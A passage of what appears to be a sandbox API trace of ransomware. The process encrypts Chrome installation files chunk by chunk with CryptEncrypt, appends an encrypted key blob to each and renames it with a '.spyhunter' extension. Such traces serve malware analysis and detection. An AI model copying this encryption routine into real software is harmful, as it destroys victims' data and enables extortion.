DB\\msdatt.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.606] GetProcessHeap () returned 0x2c0000 [0122.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.606] GetProcessHeap () returned 0x2c0000 [0122.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03cf8 | out: hHeap=0x2c0000) returned 1 [0122.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf868 | out: pbBuffer=0x25cf868) returned 1 [0122.606] GetProcessHeap () returned 0x2c0000 [0122.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf860*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf860*=0x30) returned 1 [0122.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03b58 | out: hHeap=0x2c0000) returned 1 [0122.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf868 | out: pbBuffer=0x25cf868) returned 1 [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf860*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf860*=0x30) returned 1 [0122.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e038e8 | out: hHeap=0x2c0000) returned 1 [0122.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf860 | out: pbBuffer=0x25cf860) returned 1 [0122.607] GetProcessHeap () returned 0x2c0000 [0122.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf858*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf858*=0x30) returned 1 [0122.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.609] GetProcessHeap () returned 0x2c0000 [0122.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.609] GetProcessHeap () returned 0x2c0000 [0122.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03818 | out: hHeap=0x2c0000) returned 1 [0122.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf860 | out: pbBuffer=0x25cf860) returned 1 [0122.609] GetProcessHeap () returned 0x2c0000 [0122.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf858*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf858*=0x30) returned 1 [0122.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.609] GetProcessHeap () returned 0x2c0000 [0122.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.610] GetProcessHeap () returned 0x2c0000 [0122.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0122.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf858 | out: pbBuffer=0x25cf858) returned 1 [0122.610] GetProcessHeap () returned 0x2c0000 [0122.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf850*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf850*=0x30) returned 1 [0122.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.610] GetProcessHeap () returned 0x2c0000 [0122.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.610] GetProcessHeap () returned 0x2c0000 [0122.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03678 | out: hHeap=0x2c0000) returned 1 [0122.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf858 | out: pbBuffer=0x25cf858) returned 1 [0122.610] GetProcessHeap () returned 0x2c0000 [0122.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf850*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf850*=0x30) returned 1 [0122.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e035a8 | out: hHeap=0x2c0000) returned 1 [0122.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf850 | out: pbBuffer=0x25cf850) returned 1 [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf848*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf848*=0x30) returned 1 [0122.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e039b8 | out: hHeap=0x2c0000) returned 1 [0122.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf850 | out: pbBuffer=0x25cf850) returned 1 [0122.612] GetProcessHeap () returned 0x2c0000 [0122.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf848*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf848*=0x30) returned 1 [0122.613] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.613] GetProcessHeap () returned 0x2c0000 [0122.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0122.613] GetProcessHeap () returned 0x2c0000 [0122.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03a88 | out: hHeap=0x2c0000) returned 1 [0122.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf848 | out: pbBuffer=0x25cf848) returned 1 [0122.875] GetProcessHeap () returned 0x2c0000 [0122.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0122.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf840*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf840*=0x30) returned 1 [0122.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0122.882] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll") returned 88 [0122.882] StrStrW (lpFirst="eventlog_provider.dll", lpSrch=".txt") returned 0x0 [0122.882] GetProcessHeap () returned 0x2c0000 [0122.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0122.883] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf804, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf804*=0x2800, lpOverlapped=0x0) returned 1 [0123.000] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.001] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf804, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf804*=0x2800, lpOverlapped=0x0) returned 1 [0123.001] GetProcessHeap () returned 0x2c0000 [0123.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0123.001] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.001] WriteFile (in: hFile=0x170, lpBuffer=0x25cf844*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf804, lpOverlapped=0x0 | out: lpBuffer=0x25cf844*, lpNumberOfBytesWritten=0x25cf804*=0x4, lpOverlapped=0x0) returned 1 [0123.068] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf804, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf804*=0x30, lpOverlapped=0x0) returned 1 [0123.069] CloseHandle (hObject=0x170) returned 1 [0123.069] GetProcessHeap () returned 0x2c0000 [0123.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.069] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll.spyhunter") returned 98 [0123.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\eventlog_provider.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\eventlog_provider.dll.spyhunter")) returned 1 [0123.070] GetProcessHeap () returned 0x2c0000 [0123.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.070] GetProcessHeap () returned 0x2c0000 [0123.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.070] GetProcessHeap () returned 0x2c0000 [0123.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e6c0 | out: hHeap=0x2c0000) returned 1 [0123.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf840 | out: pbBuffer=0x25cf840) returned 1 [0123.071] GetProcessHeap () returned 0x2c0000 [0123.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.072] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf838*=0x30) returned 1 [0123.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.072] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z") returned 86 [0123.072] StrStrW (lpFirst="chrome.7z", lpSrch=".txt") returned 0x0 [0123.072] GetProcessHeap () returned 0x2c0000 [0123.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.072] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7fc*=0x2800, lpOverlapped=0x0) returned 1 [0123.115] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.115] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7fc*=0x2800, lpOverlapped=0x0) returned 1 [0123.115] GetProcessHeap () returned 0x2c0000 [0123.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.115] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.115] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf83c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf83c*, lpNumberOfBytesWritten=0x25cf7fc*=0x4, lpOverlapped=0x0) returned 1 [0123.315] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7fc*=0x30, lpOverlapped=0x0) returned 1 [0123.315] CloseHandle (hObject=0x16c) returned 1 [0123.315] GetProcessHeap () returned 0x2c0000 [0123.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.315] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.spyhunter") returned 96 [0123.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.spyhunter")) returned 1 [0123.317] GetProcessHeap () returned 0x2c0000 [0123.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.317] GetProcessHeap () returned 0x2c0000 [0123.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.317] GetProcessHeap () returned 0x2c0000 [0123.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9fd0 | out: hHeap=0x2c0000) returned 1 [0123.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf840 | out: pbBuffer=0x25cf840) returned 1 [0123.317] GetProcessHeap () returned 0x2c0000 [0123.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf838*=0x30) returned 1 [0123.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.318] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png") returned 95 [0123.318] StrStrW (lpFirst="smalllogo.png", lpSrch=".txt") returned 0x0 [0123.318] GetProcessHeap () returned 0x2c0000 [0123.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.318] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7fc*=0x1ef3, lpOverlapped=0x0) returned 1 [0123.441] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffe10d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.441] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1ef3, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7fc*=0x1ef3, lpOverlapped=0x0) returned 1 [0123.441] GetProcessHeap () returned 0x2c0000 [0123.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.441] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.441] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf83c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf83c*, lpNumberOfBytesWritten=0x25cf7fc*=0x4, lpOverlapped=0x0) returned 1 [0123.441] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7fc*=0x30, lpOverlapped=0x0) returned 1 [0123.442] CloseHandle (hObject=0x16c) returned 1 [0123.442] GetProcessHeap () returned 0x2c0000 [0123.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.442] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.spyhunter") returned 105 [0123.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png.spyhunter")) returned 1 [0123.443] GetProcessHeap () returned 0x2c0000 [0123.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.443] GetProcessHeap () returned 0x2c0000 [0123.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0123.443] GetProcessHeap () returned 0x2c0000 [0123.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e710 | out: hHeap=0x2c0000) returned 1 [0123.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf830 | out: pbBuffer=0x25cf830) returned 1 [0123.446] GetProcessHeap () returned 0x2c0000 [0123.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0123.447] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf828*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf828*=0x30) returned 1 [0123.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0123.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig") returned 132 [0123.447] StrStrW (lpFirst="widevinecdmadapter.dll.sig", lpSrch=".txt") returned 0x0 [0123.447] GetProcessHeap () returned 0x2c0000 [0123.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0123.447] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf7ec*=0x57f, lpOverlapped=0x0) returned 1 [0123.578] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffa81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.578] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x57f, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf7ec*=0x57f, lpOverlapped=0x0) returned 1 [0123.578] GetProcessHeap () returned 0x2c0000 [0123.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0123.578] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.578] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf82c*, lpNumberOfBytesWritten=0x25cf7ec*=0x4, lpOverlapped=0x0) returned 1 [0123.578] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7ec*=0x30, lpOverlapped=0x0) returned 1 [0123.578] CloseHandle (hObject=0x16c) returned 1 [0123.578] GetProcessHeap () returned 0x2c0000 [0123.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.579] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.spyhunter") returned 142 [0123.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig" (normalized: 